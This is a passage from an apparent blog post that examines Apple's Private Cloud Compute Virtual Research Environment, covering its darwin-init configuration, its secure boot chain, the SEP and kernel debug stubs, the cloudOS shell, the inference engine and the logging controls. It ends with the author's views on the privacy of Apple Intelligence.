}</span>
</code></pre>
<p>In the documentation, Apple says that the role of <code>darwin-init</code> is similar to Canonical’s cloud-init. Each PCC instance starts from a clean state with no configuration and only the base operating system, then <code>darwin-init</code> is responsible to load in additional required code and configurations from the server’s Baseboard Management Controller (BMC, or similar to lights-out chip solutions like HPE iLO or DELL iDRAC).</p>
<p>Configuration security is managed through the config-security-policy key, which darwin-init uses to enforce environment-specific constraints on allowable configuration options. This mechanism enables development flexibility while maintaining strict security controls in production environments.</p>
<p>The configuration policy state undergoes ratcheting into the Configuration Seal Register, making it available for verification through attestations by user devices. To maintain compatibility and simplify verification between client devices and nodes, the Configuration Seal Register contains only the policy state and specifically selected keys, rather than the complete <code>darwin-init</code> configuration. Within PCC's threat model, this configuration data is treated as attacker-controlled, with <code>darwin-init</code> permitting only configuration options that cannot compromise the system's security or privacy properties, with the safe configuration listed <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/appendix_systemconfig">here</a>.</p>
<p>The <code>darwin-init</code> configuration uses a JSON-like format, with several different things we can customize :</p>
<ul>
<li><p>Basic Configuration Parameters:</p>
<ul>
<li><p><code>apply-timeout</code> maximum time allowed for applying the configuration</p>
</li>
<li><p><code>config-security-policy-version</code> version of the security policy being used</p>
</li>
</ul>
</li>
<li><p><code>cryptex</code> to install on the node, here we can see that we have several cryptexes such as</p>
<ul>
<li><p><code>FM_LANGUAGE_SECURITY_RESEARCH_V1</code> which is the miniaturized basic LLM model used in the PCC VRE</p>
</li>
<li><p><code>PrivateCloudSupport</code> which contains Apple’s ML stack and support several other components</p>
</li>
<li><p><code>Debug Shell for Private Cloud Security Research VM</code> which is a custom cryptex added as part of the VRE for gaining a shell inside of the PCC node, under normal circumstances this isn’t here</p>
</li>
</ul>
</li>
<li><p><code>log</code> which is currently set to disabled and set to public privacy level, by default the PCC does not store application-level logs</p>
</li>
<li><p><code>preferences</code> Contains several important system configurations:</p>
<ul>
<li><p>cloudOSBuildVersion <code>3B5621j.1</code></p>
</li>
<li><p>GRPC configuration for <code>cloudboardd</code></p>
<ul>
<li><p>Listening on all interfaces (0.0.0.0)</p>
</li>
<li><p>Using self-signed certificates</p>
</li>
</ul>
</li>
<li><p>Server type <code>Darwin Cloud Customer Install</code></p>
</li>
<li><p>Cloud type <code>Private cloudOS Customer</code></p>
</li>
</ul>
</li>
<li><p><code>secure-config</code> which contains various security-related settings</p>
<ul>
<li><p>Crash redaction is enabled</p>
</li>
<li><p>Log and metrics filtering are enforced</p>
</li>
<li><p>Custom policy path for auditing</p>
</li>
<li><p>Certain infrastructure enforcement is disabled</p>
</li>
<li><p>TIE restrictions are in place</p>
</li>
</ul>
</li>
<li><p><code>user</code> that sets SSH with root access</p>
</li>
<li><p><code>userspace-reboot</code> is set to "rem" (Restricted Execution Mode)</p>
</li>
<li><p>Failure action is set to "exit"</p>
</li>
</ul>
<p>Aside for the <code>Debug Shell for Private Cloud Security Research VM</code> cryptex, all of these settings are vanilla and should reflect what is being run in production systems at Apple PCC nodes. But these parameters are customizable in the PCC VRE, including features like downgrading certain security protection measures and enabling the collection of logs through the <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/vreresearchvariant">research variant</a>. The <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/vreinteraction">VRE Interaction Manual</a> also list ways to gather security telemetry and observability metrics for the PCC through a special configuration for the PCC VRE instance that is editable via the <code>darwin-init</code> tool.</p>
<p>When you’re done setting up your instance build, you can start the instance using the <code>pccvre instance start</code> command.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961601422/0f494fc5-aedf-4278-a4dc-d46f00400b44.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742603258/5ef380f2-9230-4569-8d6f-45ef65fe09a4.jpeg" alt class="image--center mx-auto" /></p>
<p>At a high level, the initial stage begins when Boot ROM validates the Image4 boot manifest, known as the APTicket. The APTicket implements cryptographic device personalization through SoC-specific binding using hardware identifiers and TSS-managed rotating anti-replay values. The manifest follows Apple's ASN.1-based Image4 specification, with measurements signed by Apple's Root CA and verified against the public key embedded in Boot ROM.</p>
<p>The Boot ROM's validation sequence performs cryptographic measurements of both iBoot and SEP firmware components through secure hash computations. These measurements must correspond exactly to the signed values in the APTicket manifest. The verification process encompasses ASN.1 structure validation, Root CA signature chain verification, and hardware-specific personalization validation including device identifiers (CPID, ECID) and anti-replay nonce verification.</p>
<p>The manifest validation enforces hardware-binding through cryptographic personalization where device-specific variables (UID, CPID, anti-replay nonces) are incorporated into the signature verification process. This binding ensures APTickets are non-transferable between devices and prevents replay attacks through the TSS-managed rotating values.</p>
<p>Upon successful verification, Boot ROM locks the measurements into two hardware registers:</p>
<ul>
<li><p><code>SEAL_DATA_A</code> for the AP chain measurements</p>
</li>
<li><p><code>SEAL_DATA</code> for SEP measurements</p>
</li>
</ul>
<p>These registers are write-once, creating an immutable record of the verified boot state that becomes integral to the device's attestation system. Only after this verification does the Boot ROM transfer execution control to iBoot. The SEAL register values, combined with other hardware-derived keys and measurements, form the basis for subsequent attestation operations through the Platform Key Accelerator (PKA), enabling remote verification of the device's secure boot state.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961601422/0f494fc5-aedf-4278-a4dc-d46f00400b44.png" alt class="image--center mx-auto" /></p>
<p>iBoot is Apple's proprietary bootloader. This particular readout appears to be from a specialized research or development unit, as indicated by the identifier "vresearch101" in its name. The presence of "Supervisor" in the header suggests this might be running in a privileged or administrative mode.</p>
<p>The boot process shown here is occurring locally on Board 0x90, which is referenced both in the board identification line and in the USB serial number details. The system appears to be running a release build of iBoot version 11881.40.153, suggesting this is a stable, production-ready version. Each boot instance is assigned a unique UUID (<code>81FBADC5-D014-3532-93C1-6D6B119F012C</code>), which helps in tracking and identifying specific boot sessions.</p>
<p>The most detailed information comes from the USB serial number line, which contains several critical identifiers about the hardware. The Chip ID (<code>CPID:FE01</code>) identifies the specific model of Apple silicon being used, while the <a target="_blank" href="https://support.apple.com/en-mz/guide/security/secf683e0b36/web#:~:text=Site%20Map-,Exclusive%20Chip%20Identification%20\(ECID\),identifier%20that%E2%80%99s%20unique%20to%20the%20processor%20in%20each%20iPhone%20or%20iPad.">Exclusive Chip ID</a> (<code>ECID:947A770F7EAB271B</code>) provides a unique identifier for this particular chip - similar to a serial number but at the silicon level. The system's security configuration is indicated by various markers including the Secure Domain (<code>SDOM:01</code>), Security Epoch (<code>SCEP:01</code>), and iBoot flags (<code>IBFL:3D</code>).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742642466/2924328a-9e5d-47a6-905c-32366f0454cf.jpeg" alt class="image--center mx-auto" /></p>
<p>iBoot then extends the boot chain by performing its own set of verifications. It validates multiple system firmware components against the APTicket, including three critical components: the Secure Page Table Monitor (SPTM), the Trusted Execution Monitor (TXM), and the Kernel Cache. After successful verification, iBoot hands off execution to the SPTM.</p>
<p>The Secure Page Table Monitor (SPTM) begins its initialization sequence with a critical bootstrap phase that establishes the fundamental security architecture of the system. During <code>bootstrap_stage_announce</code>, SPTM performs several crucial setup operations for the Protected Address Page Table (PAPT) ranges.</p>
<p>The initialization starts with sptm_bootstrap_early, which validates critical parameters where it establishes the initial memory map and prepares for the creation of secure page tables. The system then proceeds with <code>bootstrap_alloc_frames</code>, which allocates the initial set of CTRR-protected frames necessary for maintaining the security of the page table hierarchy.</p>
<p>During this early phase, SPTM configures the IOMMU through the processor subsystem initialization. This involves setting up secure DMA remapping tables, configuring Stream IDs (SIDs), and establishing the initial IOMMU translation tables. The system carefully validates each configuration step to ensure the integrity of IO memory operations.</p>
<p>Following SPTM's initial setup, the system proceeds to initialize the Trusted Execution Monitor (TXM). The TXM initialization process begins with the establishment of the secure execution environment and trust verification mechanisms. The system first loads and verifies the Image4 format firmware components, establishing the root of trust through the certificate chain verification process before then initializing its trust cache system, setting up the verification pathways for different trust domains (PDI, DDI, cryptex). The process includes validation of manifest-properties and boot-manifest-hash to ensure the integrity of the boot chain.</p>
<p>The <code>CoreEntitlements</code> framework is initialized during this phase, establishing the infrastructure for runtime entitlement verification. This includes setting up the acceleration contexts and dictionary structures that will be used for efficient entitlement validation during system operation.</p>
<p>As the boot process continues, SPTM establishes the complete memory management infrastructure. The system initializes the page table hierarchy with strict reference counting (rc16) for tracking page table usage. SPTM sets up the PAPT ranges through <code>bootstrap_register_papt_range</code>, establishing protected memory regions that will be crucial for system security.</p>
<p>Before transferring control to the kernel, the system configures the dispatch mechanism that will control transitions between security domains, setting up the state machine transitions and validation requirements. SPTM then establishes the exception handling pathways through sptm_dispatch, ensuring that all security domain crossings will be properly validated and controlled throughout system operation.</p>
<p>The transfer of control to the kernel represents a critical transition in the boot process. SPTM ensures this transition occurs securely by validating the kernel's code signature through TXM's verification pipeline. It then establishes the initial set of page table mappings that the kernel will operate within, and sets up the security monitor hooks that will continue to enforce memory protection policies during runtime operation.</p>
<p>As the system completes initialization and transitions to user space, the security infrastructure established by SPTM and TXM continues to operate. The entitlement validation system enforces access controls and security policies for running applications. The IOMMU continues to enforce DMA security policies for device interactions.</p>
<p>TXM's trust cache system actively validates code signatures for all executable code loaded into the system, while SPTM performing fundamental security operations like page table management and memory protection. The system is designed such that a TXM compromise doesn’t automatically translate to an SPTM bypass due to this privilege separation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742670973/45cf05d4-a1b3-47b8-80a7-19f5c92e828b.jpeg" alt class="image--center mx-auto" /></p>
<p>Parallel to this main boot sequence, the SEP (Secure Enclave Processor) undergoes its own independent boot chain that begins simultaneously with the Application Processor (AP) boot sequence with the SEPROM (Secure Enclave Boot ROM) beginning execution from its immutable code laid down during SoC fabrication, forming the hardware root of trust for the SEP.</p>
<p>The initial boot sequence involves SEPROM setting up the MMU to enable virtual memory address translation. During this initialization phase, SEPROM performs critical setup tasks including storing CPU tick counts, configuring stack pointers, setting up exception vectors, and initializing different CPU modes. Communication between SEP and AP occurs through a dedicated mailbox interface, which is the only communication channel between the two processors. This interface operates through mapped IO registers accessible to both processors, with messages limited to 8 bytes following a structured protocol with specific opcodes.</p>
<p>iBoot is responsible for initiating communication with SEPROM through this mailbox interface. iBoot sends the SEP firmware to SEPROM and sets up the TZ0 registers that define protected memory regions. These TZ0 registers are crucial for memory isolation, using both base and end registers that, once locked, prevent AP access to SEP memory regions.</p>
<p>The memory protection mechanism employs three layers: isolation through AMCC (Apple Memory Cache Controller) preventing AP access to TZ0 memory, encryption using AES-256-XEX(XTS) mode with two 32-byte keys, and integrity checking through checksums of encrypted memory.</p>
<p>SEPROM independently verifies the signature of the sepOS firmware against measurements stored in the APTicket (Image4 boot manifest). Upon successful verification, SEPROM locks these measurements into the <code>SEAL_DATA</code> register, similar to how Boot ROM locks AP measurements in <code>SEAL_DATA_A</code>. This locking mechanism is immutable and cannot be altered after manufacturing, ensuring the integrity of the boot chain.</p>
<p>The actual loading of sepOS occurs after successful verification, with SEPROM copying the verified firmware into protected memory regions established by the TZ0 configuration. The memory layout includes dedicated RAM regions for stack and data, along with carefully mapped IO registers and shared memory regions. After loading sepOS, SEPROM sets up bootargs and transfers control to the SEP firmware.</p>
<p>Once sepOS begins execution, it initializes the SEP application environment, setting up crucial security services including the Platform Key Accelerator (PKA) and various cryptographic operations. The SEP maintains its own nonce for DFU/Recovery operations, further isolating its security state from the AP. Throughout this entire process, the memory regions remain protected by the TZ0 configuration established earlier, preventing any unauthorized access from the AP side.</p>
<p>The PCC, as with other Apple hardware, relies heavily on the Secure Enclave Processor (SEP) for boot and code integrity checking. While the PCC in itself its near, Apple’s new open-gate principle for sepOS caught many by surprise.</p>
<p>In iOS 18 Developer Beta 4, Apple <a target="_blank" href="https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-18-release-notes#:~:text=The%20firmware%20image,more%20details.%20\(125171074\)">announced</a> that the iBoot and sepOS firmware for the PCC is being released in plaintext. This also coincided with the disabling of firmware encryption for iBoot on iOS, macOS, watchOS, tvOS, and visionOS to increase performance overhead.</p>
<p>While not being mentioned in the release, looking in the source code revealed that Apple opened a GDB stub for the SEP.</p>
<pre><code class="lang-swift"><span class="hljs-keyword">case</span> .vresearch101:
    <span class="hljs-keyword">let</span> sep_config = _VZSEPCoprocessorConfiguration(storageURL: bundle.sepStoragePath)
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">let</span> avpsepbooter { <span class="hljs-comment">// default AVPSEPBooter.vresearch1.bin from VZ framework</span>
        sep_config.romBinaryURL = avpsepbooter
    }
    sep_config.debugStub = _VZGDBDebugStubConfiguration()
    config._coprocessors = [sep_config]

    pconf._isProductionModeEnabled = (platformFusing == .prod)
</code></pre>
<p>Listing all open ports, we can see that there isn’t just one open port relating to Apple, but three. The top one is the kernel GDB stub i’ve mentioned beforehand, and i can’t seem to find anything related to <code>53705</code>.</p>
<pre><code class="lang-bash">➜  ~ lsof -PiTCP -sTCP:LISTEN
pccvre    21915 zefiepie   14u  IPv4 0x5c32866ea688829f      0t0  TCP 192.168.64.1:53704 (LISTEN)
com.apple 21923 zefiepie    7u  IPv4 0x98c787175eb69f32      0t0  TCP localhost:53705 (LISTEN)
com.apple 21923 zefiepie    9u  IPv4 0x65a79314b9e6fe98      0t0  TCP localhost:53706 (LISTEN)
com.apple 21925 zefiepie    3u  IPv4 0x65a79314b9e6fe98      0t0  TCP localhost:53706 (LISTEN)
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1731752474529/007b1399-ab61-48e3-be6b-601f99f9580b.png" alt class="image--center mx-auto" /></p>
<p><code>53706</code> is the GDB stub for the Secure Enclave, we can figure it out by disassembling some of the code in the higher address spaces where we can find that a string that indicates the sepOS boot code that then jumps to the kernel address. This will likely be an interesting avenue to do SEP/iBoot research moving forward.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742569349/71a1cde8-af00-4655-9d9f-1017010c587a.jpeg" alt class="image--center mx-auto" /></p>
<p>The final stage of initialization occurs in user space, where the darwin-init task takes control. This task configures the node based on information it receives from the BMC, including determining which cryptexes to load. After loading all required cryptexes, darwin-init initiates the transition into Restricted Execution Mode (REM). This transition is a one-way process that must meet specific conditions: all "before" code must be unloaded from memory, and the Cryptex Manifest Register must be locked. Only after entering REM does the node become available to serve external requests.</p>
<p>Throughout this process, the system employs Software Sealed Registers (SSRs) to maintain a verifiable record of the boot state. Two specific SSRs are crucial: the Cryptex Manifest Register, which contains digests of Image4 manifests from activated cryptexes, and the Configuration Seal Register, which holds digests of critical darwin-init configuration data. These registers operate on a ratcheting mechanism - once updated, their values cannot be rolled back, and their state is included in all attestations generated by the SEP.</p>
<p>After the process completes, this is where the fun starts. We are offered different ways to interact with the PCC :</p>
<ul>
<li><p>A HTTP service was started, no idea what this is used for but it returns an <code>IOError (other) pread(descriptor:pointer:size:offset:): Is a directory (errno: 21)</code></p>
</li>
<li><p>A GDB stub for kernel debugging</p>
</li>
<li><p>A debug shell <a target="_blank" href="https://keith.github.io/xcode-man-pages/cryptex.5.html">cryptex</a> that contains a shell (through SSH)</p>
</li>
</ul>
<h2 id="heading-ios-now-more-lobotomized">iOS, Now More Lobotomized!</h2>
<p>As said before, CloudOS is just a cut down version of iOS, more very stripped down than it already is. Using the debug cryptex we can gain a shell to CloudOS by using SSH to see further for ourselves.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729873812890/2b84bffe-1e16-4d3c-af35-22b6d2c5e45e.png" alt class="image--center mx-auto" /></p>
<p>After enabling SSH in the PCC VRE instance, you can simply login to it like usual.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729873853347/7dde73df-ed3d-4776-8fd0-5aa80cd2a463.png" alt class="image--center mx-auto" /></p>
<p>Welcome to cloudOS, something that you quickly discover is how barebones the VM is. There is no <code>help</code> or <code>clear</code> command, nor any sort of package management system like <code>apt</code> or <code>brew</code>. Built-in interpreters, debuggers, and any sort of Just-In-Time compiler functionality were also removed to prevent dynamic code execution.</p>
<p>After diving into <code>/var/</code> we finally arrive at the meat of the PCC, which contains alot of files crucial for PCC operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729874647202/bbaf7366-80c9-485c-8e60-21dc749f6f31.png" alt class="image--center mx-auto" /></p>
<p>There are alot of interesting things here, such as <code>DarwinDataCenterSupportImage</code> which contains support packages for system, in addition to being the place to load and store custom cryptexes. There are also several remenant folders from iOS such as <code>mail</code> and <code>backups</code>, which are empty and are unused (as far as i know.</p>
<p><code>MLModels</code> also caught my eye, which contains ML models used for the PCC, there is a small model called <code>FM_LANGUAGE_SECURITY_RESEARCH_V1</code> used for testing purposes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729878336987/1b85a3ba-d1a2-4e1b-8679-7bd50bea655e.png" alt class="image--center mx-auto" /></p>
<p>Additionally, as previously mentioned the PCC VRE provides a GDB stub you can use to connect lldb to. The stub supposedly allows for reading/writing within kernel memory, but without the symbols necessary this is still not that useful.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1731749615504/44dba9d4-78b9-4860-a773-8dad79a48ed2.png" alt class="image--center mx-auto" /></p>
<p>The fact that there is no way i can figure out (atleast currently) to take data out of the vanilla PCC VRE kinda makes me believe that Apple is making good on its promise to not use user data and interactions with Apple Intelligence for inference purposes.</p>
<h2 id="heading-stateless-inferencing">Stateless Inferencing</h2>
<p>PCC VRE won’t be the only example of using confidential computing for securing inference workloads, as Google has already published <a target="_blank" href="https://github.com/google/genc/blob/master/genc/docs/tutorials/tutorial_6_confidential_computing.ipynb">a proof-of-concept implementation</a> using gRPC over HTTPS to connect a Confidential VM containing Gemma 2B.</p>
<p>Rather than requiring a complex setup with a client device, the PCC VRE offers a wrapper to talk to the LLM inside of the PCC.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729875735144/a0938d06-57f7-4d1d-a7ee-d77d291771e5.png" alt class="image--center mx-auto" /></p>
<p>The wrapper connects to an endpoint provided by the <code>cloudboardd</code> service in the Virtual Runtime Environment (VRE). This is the same endpoint that the PCC Gateway utilizes for connecting to PCC nodes in production environments. The <code>pccvre</code> tool leverages the CloudBoard and TIE application protocols to handle request submission and response display.</p>
<p>The command prints the result of the SEP attestation, then tokens as they are streamed, and finally the fully formed response.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729875887059/7e3dae1d-8009-4b3b-9253-a66d2486cc81.png" alt class="image--center mx-auto" /></p>
<p>The idea is that once your request gets inferenced within the PCC, sent back to you, and the data is immediately destroyed. User data is designed to never be available to Apple, even to staff with administrative access to the production service or hardware.</p>
<p>The core of the inference operations lies in The Inference Engine (TIE), which handles the logic of executing inference requests that users submit to PCC. Requests are received on the PCC node by <code>CloudBoard</code>, which is responsible for implementing the cryptographic protocol with a user’s device, and are then handed off to TIE for processing. The <code>tie-model-owner</code> process employs the ModelCatalogSE framework to load model weights, adapters, and associated parameters from disk into memory.</p>
<p>ModelCatalogSE maintains an index of model data and metadata, including tokenizers, stop tokens, and prompt templates, which are derived from model and adapter cryptexes on the PCC node. The inference components operate under the orchestration of a single <code>tie-controllerd</code> daemon, which functions as TIE's primary control system, managing inference process recycling, and initiates periodic CIO mesh key rotations. Furthermore, <code>tie-controllerd</code> interfaces with CloudBoard's Runtime configurable properties to retrieve prompt deny lists, which enumerate blocked inputs that could potentially compromise system stability.</p>
<p>When requests arrive at a PCC node, TIE processes them through an ephemeral, per-request <code>tie-cloud-app</code> instance. The system utilizes process pooling to mitigate process spawning runtime overhead, that comprise of pre-instantiated <code>cb_jobhelper</code> and <code>tie-cloud-app</code> pairs maintained in readiness to service requests. Upon CloudBoard's selection of a <code>tie-cloud-app</code> instance for request handling, the application deserializes the incoming Protobuf-encoded request, validates request parameter safety, and tokenizes the string-based prompt using the model cryptex-specified tokenizer.</p>
<pre><code class="lang-plaintext">message InvokeWorkloadRequest {
    oneof type {
        Setup setup = 1;
        Terminate terminate = 2;
        Chunk request_chunk = 3;
        Parameters parameters = 4;
    }
}

message InvokeWorkloadResponse {
    oneof type {
        SetupAck setup_ack = 1;
        Chunk response_chunk = 2;
    }
}
</code></pre>
<p>TIE executes tokenization within a per-request process to isolate untrusted string input parsing. The implementation of per-request process instances ensures that potential process compromises would not expose other users' request data. The system discards all intermediate request data upon request completion and process termination. After initial request processing, the <code>tie-cloud-app</code> transmits the request to a shared <code>tie-inference</code> process that executes the inference using MetalLM. The request data encompasses the tokenized input, model and adapter identifiers for inference, sampling parameters, and when applicable, the constrained decoding grammar.</p>
<p>To minimize the risk of unexpected user data retention beyond single request lifetimes in the inference host process, the <code>tie-controller</code> periodically terminates and restarts <code>tie-inference</code> which ensures that data processed within previous inference host instances remains inaccessible to potential attacks that might compromise future instances.</p>
<p>Within <code>MLModels/LLM/FM_LANGUAGE_SECURITY_RESEARCH_V1/LLM.Model/4.0.0</code> sits a 1.8 GB <code>model.mlm</code> file, which is a small machine learning model created in Apple Create ML. Admittedly i was abit disappointed because i thought Apple will lend a peek into the bigger LLM models they supposedly have in the cloud.</p>
<p>The model within the PCC VRE is likely based on Apple’s open source <a target="_blank" href="https://huggingface.co/apple/OpenELM-450M">OpenELM-450M</a> simply by seeing the model size, with the model being converted to support Apple’s CreateML Framework. But the PCC is supposed to house bigger models, which are called <a target="_blank" href="https://arxiv.org/pdf/2407.21075">Apple Foundation Models (AFM)</a> which are dense decoder-only models that build on the Transformer architecture with the following design choices:</p>
<ul>
<li><p>A shared input/output embedding matrix to reduce parameter count, and therefore memory usage.</p>
</li>
<li><p>Pre-Normalization with RMSNorm for training stability.</p>
</li>
<li><p>Query/key normalization to improve training stability.</p>
</li>
<li><p>Grouped-query attention (GQA) with 8 key-value heads to reduce the KV-cache memory footprint.</p>
</li>
<li><p>SwiGLU activation for higher efficiency.</p>
</li>
<li><p>RoPE positional embeddings with the base frequency set to 500k for long-context support.</p>
</li>
</ul>
<p>Consistent with Apple’s whole branding on privacy-preservation, the data used for Apple Intelligence is also supposedly open sourced. The AFM pre-training dataset consists of a diverse and high quality data mixture:</p>
<ol>
<li><p>Web pages: Crawled using Applebot, respecting publishers’ rights to opt out. The data is filtered to exclude profanity, unsafe material, personally identifiable information (PII), and processed through a pipeline that performs quality filtering, plain-text extraction, and decontamination against 811 common pre-training benchmarks.</p>
</li>
<li><p>Licensed datasets: High-quality data licensed from publishers, providing diverse and long-context data for continued and context-lengthening stages of pre-training. The data is decontaminated in the same way as web pages.</p>
</li>
<li><p>Code: Obtained from license-filtered open-source repositories on GitHub, covering 14 common programming languages. The data is de-duplicated, filtered for PII and quality, and decontaminated in the same fashion as web pages.</p>
</li>
<li><p>Public datasets: High-quality publicly-available datasets with licenses permitting use for training language models. The datasets are filtered to remove PII before being included in the pre-training mixture.</p>
</li>
<li><p>Math: Two categories of high-quality data sourced from the web:</p>
<ul>
<li><p>Math Q&amp;A dataset: 3 billion tokens from 20 web domains rich in math content, extracted by identifying relevant tags from HTML pages.</p>
</li>
<li><p>Collection of 14 billion tokens from web pages such as math forums, blogs, tutorials, and seminars. The data is filtered using a specialized pipeline that includes math tag filters, symbol filters, quality filters powered by language models, and domain filters processed by humans.</p>
</li>
</ul>
</li>
</ol>
<p>While there are concerns that the models inside of the PCC <a target="_blank" href="https://blog.trailofbits.com/2024/06/14/pcc-bold-step-forward-not-without-flaws/">can still using user data for training</a>, <a target="_blank" href="https://support.apple.com/en-us/120320#:~:text=We%20do%20not%20use%20our,publicly%20available%20on%20the%20internet.">Apple has said that</a> it does not use private user data or interactions with Apple Intelligence when training its foundational models. If Apple complies to this, then it does mean that they have achieved the capability to do stateless inferencing without resorting to exotic methods mentioned earlier.</p>
<h2 id="heading-minimal-logging-and-telemetry">Minimal Logging and Telemetry</h2>
<p>Every single server-side application will need somesort of logging and telemetry system to ensure the availability and security of the applications being run. But how do you do it inside of a system that is supposed to be a black-box to outsiders and does not collect any data whatsover?</p>
<p>At the core of this is <code>CloudMetrics</code>, which implements the swift-metrics API backend. This system enables software within the <code>PrivateCloudSupport</code> cryptex to log various metric types including counters, gauges, and histograms. The metric collection process follows a structured flow where observations are first provided to the <code>CloudMetrics</code> framework, then transmitted via XPC to the cloudmetricsd daemon where temporal aggregation occurs locally. These aggregated metrics are subsequently exported to Apple's metrics service using the OpenTelemetry Protocol, an industry-standard for observability data transmission.</p>
<p>The system implements strict controls over metric collection through a restrictive allow-list mechanism within CloudMetrics. This framework exercises granular control over metric export frequency and implements filtering based on metric names, allowed dimensions, and valid value ranges. Importantly, these configurations reside within the <code>PrivateCloudSupport</code> cryptex, ensuring they fall under PCC's verifiable transparency guarantees.</p>
<p>For logging capabilities, PCC utilizes the privacy-conscious <code>os_log</code> API, with log export handled by the <code>splunkloggingd</code> daemon. This daemon implements sophisticated filtering rules that operate on a per-log-line basis, scrutinizing both the message sender (identified by the Mach-O image) and the format string. The system maintains a carefully curated allow list of permitted messages, which undergoes rigorous privacy review considering not only the format strings but also the data types of included variables.</p>
<p>The crash reporting system in PCC builds upon existing privacy-preserving infrastructure from macOS and iOS, but implements additional safeguards. It categorizes crash data into intrinsically safe attributes (such as OS version and process IDs) and process state dependent data (like stack traces and register state). The system applies two levels of redaction - partial and full - with strict rate limiting of partially redacted logs to a maximum of three per node per hour, randomly selected from 20% of crashes.</p>
<p>We finally meet again with <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products">an old friend</a>, the <code>EndpointSecurity</code> API, which is responsible for monitoring security events in MacOS. PCC nodes capture only a few events, mainly</p>
<ul>
<li><p><code>ES_EVENT_TYPE_NOTIFY_EXEC</code> (for process execution)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_EXIT</code> (for process exit)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN</code> (activation of certain hardware features)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_OPENSSH_LOGIN</code> (SSH logins)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_OPENSSH_LOGOUT</code> (SSH logouts)</p>
</li>
<li><p><code>NetworkStatistics</code> (Network inbound/outbound connections)</p>
</li>
</ul>
<p>The security event collection system prioritizes metadata capture over process introspection, implementing a privacy-first approach to security monitoring. Event export occurs through the <code>splunkloggingd</code> daemon, utilizing the same robust filtering mechanism that governs log message export. The configuration controlling permitted security events resides within the PrivateCloudSupport cryptex, ensuring transparency and verifiability of the monitoring scope.</p>
<p>All collected security events undergo aggregated analysis by Apple's security teams to identify potential compromise indicators. This analysis occurs within a framework that maintains PCC's core privacy guarantees while enabling effective security monitoring. The system achieves this balance by focusing on event patterns and metadata analysis rather than direct examination of process internals or user data.</p>
<p>The entire observability and security monitoring infrastructure operates within PCC's network security framework, controlled by the <code>denaliSE</code> firewall agent. This agent ensures that all monitoring and metric data transmission occurs only to authorized data center services, operating under mutual TLS authentication with certificates managed by the Secure Enclave Processor. This network-level control provides an additional layer of protection against unauthorized data exfiltration while enabling essential operational monitoring.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>From the brief examination of the OS and tooling surrounding the PCC, we can somewhat confidently that Apple is atleast lining itself for a really big lawsuit if it doesn’t play along with its privacy guarantees for Apple Intelligence and other offloaded AI/ML workloads. There is probably much more to discover, which will probably be covered by people that are way more technically proficient than myself.</p>
<p>I think the privacy guarantees around Apple Intelligence and the unprecendented access to the tools that support its secure operations is a big step towards providing a more privacy-preserving AI platform, which has certainly come a long way from Apple’s first inclusion of privacy-preserving technologies like the Secure Enclave. Apple has been working hard in implementing other, more bulletproof, solutions such as <a target="_blank" href="https://machinelearning.apple.com/research/homomorphic-encryption">Homomorphic Encryption (HE) for ML workloads</a> and a focus towards more on-device inference for sensitive items such as for <a target="_blank" href="https://developer.apple.com/documentation/sensitivecontentanalysis/detecting-nudity-in-media-and-providing-intervention-options">sensitive content detection</a>.</p>
<p>This doesn’t mean Apple Intelligence is fully secure, as it still relies on API calls to notorious AI firms like OpenAI which <a target="_blank" href="https://theconversation.com/openais-data-hunger-raises-privacy-concerns-237448">has been known to be very data hungry</a>. Fortunately, Apple always asks before your requests are sent to non-Apple entities and these features can be turned off unlike other <a target="_blank" href="https://www.theregister.com/2024/06/03/windows_11_recall_on_default/">shoehorned AI systems recently</a>. Apple also has a history in compromising the security of its server infrastructure to comply to national regulations in countries like <a target="_blank" href="https://www.nytimes.com/2021/05/17/technology/apple-china-censorship-data.html">Mainland China</a>.</p>
<p>The thing is that if your mind is already made up on this technology, and you know who you are, its more likely that you’ve already made up your mind and all of these attempts are unconvincing for you. For you, Apple has also given the option to completely <a target="_blank" href="https://support.apple.com/guide/iphone/introducing-apple-intelligence-iphc28624b81/ios#:~:text=To%20deactivate%20Apple%20Intelligence%20during,button%20next%20to%20Apple%20Intelligence.">disable Apple Intelligence</a>. Apple also give <a target="_blank" href="https://support.apple.com/en-us/120320#:~:text=We%20do%20not%20use%20our,publicly%20available%20on%20the%20internet.">guidelines</a> on how to set <code>robots.txt</code> parameters to stop your data from being scraped by Applebot (Apple’s web scraper) and how to request to opt-out of training entirely.</p>
<p>The thing i want to underscore is that i do believe the oversimplification and subsequent demonization of AI technologies is dangerous, because its the same technology that’s responsible from everything from helping me <a target="_blank" href="https://machinelearning.apple.com/research/recognizing-people-photos">remember my vacation with my family from three years ago</a> to <a target="_blank" href="https://www.lunit.io/en/products/mmg">the early detection of breast cancer</a>. We should encourage the research and development towards how to integrate these technologies in a better and safer way, not ban them outright.</p>
]]></content:encoded></item><item><title><![CDATA[Mitigating DMA Attacks Through Redirected Address Tables]]></title><description><![CDATA[Cover Illustration by buruberrii_

